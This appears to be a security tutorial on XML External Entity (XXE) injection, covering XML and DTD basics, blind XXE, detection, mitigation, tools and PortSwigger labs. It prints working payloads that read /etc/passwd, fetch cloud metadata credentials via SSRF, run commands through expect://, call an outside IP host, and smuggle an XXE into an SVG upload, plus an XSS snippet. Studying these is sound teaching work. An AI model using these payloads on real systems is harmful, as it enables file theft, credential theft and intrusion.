# EXternal Xml Entity (XXE)

## External XML Entity (XXE) <a href="#external-xml-entity-xxe" id="external-xml-entity-xxe"></a>

<figure><img src="https://3344169606-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FjoHbOFRbwrmbD6PvIUkf%2Fuploads%2FICjS85DrM1PwSfDooV42%2Fimage.png?alt=media&#x26;token=1b5a32da-7216-44be-8f5c-5007bf9334de" alt=""><figcaption></figcaption></figure>

| Content             |
| ------------------- |
| 📚 What Is XXE ?    |
| 🤔 Why XXE Happen ? |
| 🧬 XXE Types        |
| ⚔ Impact            |
| 🔎 How To Find      |
| 🛠 Tools            |
| 📕 Referance        |
| 🔬 Labs             |

## 📚 What Is XXE? <a href="#what-is-xxe" id="what-is-xxe"></a>

### What is XML? <a href="#what-is-xml" id="what-is-xml"></a>

XML stands for “Extensible Markup Language”, It is the most common language for storing and transporting data. It is a self-descriptive language. It does not contain any predefined tags like `<p>`, `<img>`, etc. All the tags are user-defined depending upon the data it is representing for example. `<email></email>`, `<message></message>` etc.

You can know more about XML Entities FROM [**HERE**](https://portswigger.net/web-security/xxe/xml-entities) To avoid wasting time.

### Definition of XXE: <a href="#definition-of-xxe" id="definition-of-xxe"></a>

An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server.

![](https://i.imgur.com/p5VvvI9.png)

### What is the Document Type Definition (DTD)? <a href="#what-is-the-document-type-definition-dtd" id="what-is-the-document-type-definition-dtd"></a>

It describes the structure of the document which contains elements and attributes declarations. The element declaration contains the allowable set of elements that will be used within the document. The attribute declaration contains the allowable set of attributes corresponding to each element.

Syntax: -

```xml
<!DOCTYPE element DTD identifier
[
 declaration1
 declaration2
 ........
]>
```

![](https://i.imgur.com/LWfPsLH.png)

![](https://i.imgur.com/7NXrCyk.png)

### 🤔 Why XXE Happen? <a href="#why-xxe-happen" id="why-xxe-happen"></a>

Some applications use the XML format to transmit data between the browser and the server. Applications that do this virtually always use a standard library or platform API to process the XML data on the server. XXE vulnerabilities arise because the XML specification contains various potentially dangerous features, and standard parsers support these features even if they are not normally used by the application.

***

### 🧬 XXE Types <a href="#xxe-types" id="xxe-types"></a>

1. Basic XXE
2. Blind XXE

#### Blind XXE <a href="#blind-xxe" id="blind-xxe"></a>

Blind XXE vulnerabilities arise where the application is vulnerable to XXE injection but does not return the values of any defined external entities within its responses. This means that direct retrieval of server-side files is not possible, and so blind XXE is generally harder to exploit than regular XXE vulnerabilities.

There are two broad ways in which you can find and exploit blind XXE vulnerabilities:

You can trigger out-of-band network interactions, sometimes exfiltrating sensitive data within the interaction data. You can trigger XML parsing errors in such a way that the error messages contain sensitive data.

***

### ⚔ Impact <a href="#impact" id="impact"></a>

XML External Entity (XXE) can possess a severe threat to a company or a web developer. XXE has always been in the Top 10 list of OWASP. It is common for lots of websites to use XML in the string and transportation of data and if countermeasures are not taken then this information will be compromised. Various attacks that are possible are:

* Server-Side Request Forgery (**SSRF**)&#x20;

```xml
<?xml version=”1.0” encoding=”UTF-8”?> 
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM “http://169.254.169.254/latest/meta-data/iam/security-credentials/admin”> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
```

* Remote Code Execution (**RCE**)

```xml
<?xml version=”1.0” encoding=”ISO-8859-1”?>
<!DOCTYPE foo [<!ELEMENT foo ANY > <!ENTITY xxe SYSTEM “expect://id” >]>
<stockCheck><productId>&xxe;</productId></stockCheck>
```

![](https://i.imgur.com/pKGL3Zz.png)

* Read Files

```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<stockCheck><productId>&xxe;</productId></stockCheck>
```

* Cross-Site Scripting (**XSS**)

```xml
<![CDATA[<]]>script<![CDATA[>]]>alert(1)<![CDATA[<]]>/script<![CDATA[>]]>
```

Content-Type: From JSON to XEE To change the request you could use a Burp Extension named [**Content Type Converter**](https://exploitstube.com/xxe-for-fun-and-profit-converting-json-request-to-xml.html).

Here you can find this example:

```json
Content-Type: application/json;charset=UTF-8

{"root": {"root": {
  "firstName": "Avinash",
  "lastName": "",
  "country": "United States",
  "city": "ddd",
  "postalCode": "ddd"
}}}
```

```xml
Content-Type: application/xml;charset=UTF-8

<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<!DOCTYPE testingxxe [<!ENTITY xxe SYSTEM "http://34.229.92.127:8000/TEST.ext" >]> 
<root>
 <root>
  <firstName>&xxe;</firstName>
  <lastName/>
  <country>United States</country>
  <city>ddd</city>
  <postalCode>ddd</postalCode>
 </root>
</root>
```

#### File Upload <a href="#file-upload" id="file-upload"></a>

XXE can be performed using the file upload method. We will be demonstrating this using Port Swigger lab “Exploiting XXE via Image Upload”. The payload that we will be using is:

```xml
<?XML version="1.0" standalone="yes"?>
<!DOCTYPE reset [
<!ENTITY xxe SYSTEM "file:///etc/hostname"> ] >
<svg width="500px" height="500px" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.1">
    <text font-size="40" x="0" y="100">
        &xxe;
    </text>
</svg>
```

Understanding the payload: We will make an SVG file as only the upload area accepts only image files. The basic syntax of the SVG file is given above and in that, we have added a text field that will

We will be saving the above code as “payload.svg”. Now on portswigger, we will go on a post and comment and then add the made payload in the avatar field.

***

### 🔎 How To Find <a href="#how-to-find" id="how-to-find"></a>

Detect any XML data parsing or JSON and try to inject **XXE**

***

### ⚙ Mitigation <a href="#mitigation" id="mitigation"></a>

The best way to avoid XXE vulnerabilities is to

* Altogether disable document type definitions (DTDs) in your XML parser.
* If this is impossible, you must disable external entities and document type declarations for your parser.
* disable support for `XInclude`

***

### 🛠 Tools <a href="#tools" id="tools"></a>

[**xxeftp:**](https://github.com/staaldraad/xxeserv) - A mini webserver with FTP support for XXE payloads

[**xxexploiter:**](https://github.com/luisfontes19/xxexploiter) - Tool to help exploit XXE vulnerabilities

[**230-OOB:**](https://github.com/lc/230-OOB) - An Out-of-Band XXE server for retrieving file contents over FTP and payload generation via <http://xxe.sh/>

[**XXEinjector:**](https://github.com/enjoiz/XXEinjector) - Tool for automatic exploitation of XXE vulnerability using direct and different out of band methods

[**oxml\_xxe:**](https://github.com/BuffaloWill/oxml_xxe) - A tool for embedding XXE/XML exploits into different filetypes (DOCX/XLSX/PPTX, ODT/ODG/ODP/ODS, SVG, XML, PDF, JPG, GIF)

[**docem:**](https://github.com/whitel1st/docem) - Utility to embed XXE and XSS payloads in docx,odt,pptx,etc

[**otori:**](http://www.beneaththewaves.net/Software/On_The_Outside_Reaching_In.html) - Toolbox intended to allow useful exploitation of XXE vulnerabilities.

***

### 📕 Reference <a href="#referance" id="referance"></a>

[**OWASP**](https://owasp.org/www-community/vulnerabilities/XML_External_Entity_\(XXE\)_Processing)

[**PayloadsAllTheThings**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md#tools)

[**hacktricks**](https://book.hacktricks.xyz/pentesting-web/xxe-xee-xml-external-entity)

[**hackingarticles**](https://www.hackingarticles.in/comprehensive-guide-on-xxe-injection/)

[**acunetix**](https://www.acunetix.com/blog/articles/xml-external-entity-xxe-vulnerabilities/)

[**Portswigger**](https://portswigger.net/web-security/xxe)

[**Portswigger-Xml-Entities**](https://portswigger.net/web-security/xxe/xml-entities)

[**Portswigger-Blind**](https://portswigger.net/web-security/xxe/blind)

[**XXE\_Attack\_Guide**](http://synradar.com/documents/XXE_Attack_Guide.pdf)

***

### 🔬 Labs <a href="#labs" id="labs"></a>

1. [**Portswigger**](https://portswigger.net/web-security/cross-site-scripting)\
   Portswigger Labs Solution is [**Here**](https://0xkourama.gitbook.io/blog/port-swigger-labs/xml-external-entity-xxe-injection)<br>
2. [**OWASP Broken Web Applications Project**](https://sourceforge.net/projects/owaspbwa/)**:** \
   Install this Machine and will have a lot of Labs like **DVWA**, **BWAPP,** **Webgoat,** etc